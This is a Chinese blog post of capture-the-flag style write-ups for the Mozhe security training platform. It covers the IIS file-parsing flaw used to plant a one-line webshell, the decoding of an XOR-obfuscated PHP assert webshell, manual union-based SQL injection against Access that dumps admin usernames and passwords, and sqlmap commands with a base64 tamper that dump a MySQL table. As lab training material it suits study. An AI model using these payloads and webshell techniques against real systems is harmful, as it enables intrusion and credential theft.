Ywc

墨者学院平台修炼

Word count: 732 / Reading time: 3 min
2018/07/04 Share

网址:https://www.mozhe.cn

iis文件解析漏洞

总结:可看这篇文章

题目:https://www.mozhe.cn/bug/detail/Umc0Sm5NMnkzbHM0cFl2UlVRenA1UT09bW96aGUmozhe

第一步,点开链接,尝试上传txt文件,失败,尝试doc文件,失败,尝试jpg文件,成功
第二步,编写一句话木马文件,上传,用burp抓包,修改上传路径,将upload修改为test.asp
第三步,得到一个有解析漏洞的目录及包含一句话木马的路径 ,返回地址:test.asp/20186301829580.jpg
第四步,用菜刀连接,找到KEY文件,成功得到KEY!

PHP代码分析溯源

题目地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe

1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。

2、$++;这行代码的意思是对变量名为”“的变量进行自增操作,在PHP中未定义的变量默认值为null,null==false==0,可以在不使用任何数字的情况下,通过对未定义变量的自增操作来得到一个数字。

3、$__=(“"^"?").(":"^"}").("%"^"“).(“{“^”/“);

1
2
3
4
("`"^"?")        01100000^00111111=01011111 —>”_”
(":"^"}") 00111010^01111101=01000111—>”G”
("%"^"`") 00100101^01100000=01000101—>”E”
("{"^"/") 01111011^ 00101111=01010100—>”T”

得到$__=_GET

4、$___=(“$”^”{“).(““^”.”).(“/“^”`”).(“-“^”“).(“(“^”|”);

1
2
3
4
5
("$"^"{")        00100100^01111011=01011111—>”_”
("~"^".") 01111110^00101110=01010000—>”P”
("/"^"`") 00101111^01100000=01001111—>”O”
("-"^"~") 00101101^01111110=01010011—>”S”
("("^"|") 00101000^01111100=01010100—>”T”

得到$___=_POST

5、${$}[!$](${$}[$_]);
得到$_GET0;

6、构造一句话木马,将“0”当成参数,赋值为“assert”

7、使用菜刀工具连接,地址http://ip/b.php?0=assert 密码为1

SQL手工注入漏洞测试(Access数据库)

题目链接:https://www.mozhe.cn/bug/detail/VExmTm05OHhVM1dBeGdYdmhtbng5UT09bW96aGUmozhe

注意是access数据库

注意下面的链接,点开后发现url有asp?id=1,存在注入的可能。

常规思路:

1.找注入点:/new_list.asp?id=1 and 1=1 和and 1=2 检测是否存在注入,and 1=1 返回正常,若and 1=2 返回失败 确定有注入点。

2.猜测表名:/new_list.asp?id=1 and exists(select * from 表名) 经猜测发现有admin

3.猜测字段: /new_list.asp?id=1 union select 1 form admin ,猜测有多少字段,成功猜出有1、2、3、4字段。

4.猜测字段名:/new_list.asp?id=1 and exists(select XXX from admin),猜测有哪些字段名,成功猜出有id、username、passwd字段

5.爆数据: /new_list.asp?id=1 union select 1,username,passwd,4 from admin,爆出数据,如图

mozhe

SQL注入实战MySQL

题目链接:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe

手工注入:

mozhe

Sqlmap跑

1.列出数据库名

1
python sqlmap.py -u "" --dbs --tamper base64encode.py   #(.py可加可不加)

2.列出test数据库下的表

1
python sqlmap.py -u "" --dbs --tamper base64encode.py -D test --tables

3.列出表data 下的列即字段

1
python sqlmap.py -u "" --dbs --tamper base64encode.py -D test -T data --columns

4.爆出字段内容

1
python sqlmap.py -u "" --dbs --tamper base64encode.py -D test -T data -C "id,main,thkey,title" --dump

即可得到key.

原文作者: Ywc

原文链接: https://yinwc.github.io/2018/07/04/mozhe/

发表日期: July 4th 2018, 10:51:21 am

版权声明:

CATALOG
  1. 1. iis文件解析漏洞
  2. 2. PHP代码分析溯源
  3. 3. SQL手工注入漏洞测试(Access数据库)
  4. 4. SQL注入实战MySQL
    1. 4.1. 手工注入:
    2. 4.2. Sqlmap跑